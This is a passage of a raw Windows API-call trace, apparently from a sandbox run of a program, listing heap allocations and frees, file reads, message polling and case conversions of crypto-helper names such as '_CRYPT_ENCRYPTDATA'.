hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.499] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.499] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x8427, lpOverlapped=0x0) returned 1 [0031.500] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8427) returned 0x955018 [0031.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8427) returned 0x88ffb0 [0031.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.502] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8427) returned 0x955018 [0031.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.504] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8427) returned 0x955018 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8427) returned 0x8983e0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.506] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.506] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.507] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.507] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.508] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.509] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) 